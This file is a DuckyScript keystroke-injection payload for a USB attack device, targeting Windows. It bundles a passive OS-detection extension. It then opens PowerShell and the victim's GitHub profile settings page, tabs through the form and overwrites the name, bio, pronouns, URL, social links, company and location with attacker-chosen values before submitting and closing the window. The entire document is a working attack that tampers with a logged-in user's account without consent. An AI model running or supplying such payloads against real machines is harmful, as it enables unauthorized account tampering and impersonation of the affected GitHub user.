REM_BLOCK
###################################################
#                                                 #
# Title        : Change Github Profile Settings   #
# Author       : Aleff                            #
# Version      : 1.0                              #
# Category     : Execution                        #
# Target       : Windows 10/11                    #
#                                                 #
###################################################
END_REM

REM Requirements:
REM     - Internet connection
REM     - Logged in Github
REM     - PayloadStudio >= 1.3.1

REM You must set the new Profile Settings
DEFINE #NAME example
DEFINE #BIO example
DEFINE #CUSTOM-PRONOUNS example
DEFINE #URL example
DEFINE #SOCIAL-ACCOUNT-1 example
DEFINE #SOCIAL-ACCOUNT-2 example
DEFINE #SOCIAL-ACCOUNT-3 example
DEFINE #SOCIAL-ACCOUNT-4 example
DEFINE #COMPANY example
DEFINE #LOCATION example


EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    $_OS = #NOT_WINDOWS

    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION


GUI r
DELAY 500
STRINGLN powershell
DELAY 500

STRINGLN Start-Process "https://github.com/settings/profile"; exit;
REM It depends by the computer power and by the internet connection power
DELAY 2000

REPEAT 37 TAB
STRING #NAME
REPEAT 4 TAB
STRING #BIO
TAB
REPEAT 4 DOWNARROW
STRING #CUSTOM-PRONOUNS
TAB
STRING #URL
TAB
STRING #SOCIAL-ACCOUNT-1
TAB
STRING #SOCIAL-ACCOUNT-2
TAB
STRING #SOCIAL-ACCOUNT-3
TAB
STRING #SOCIAL-ACCOUNT-4
TAB
STRING #COMPANY
TAB
STRING #LOCATION
REPEAT 4 TAB
ENTER
DELAY 2000
ALT-F4
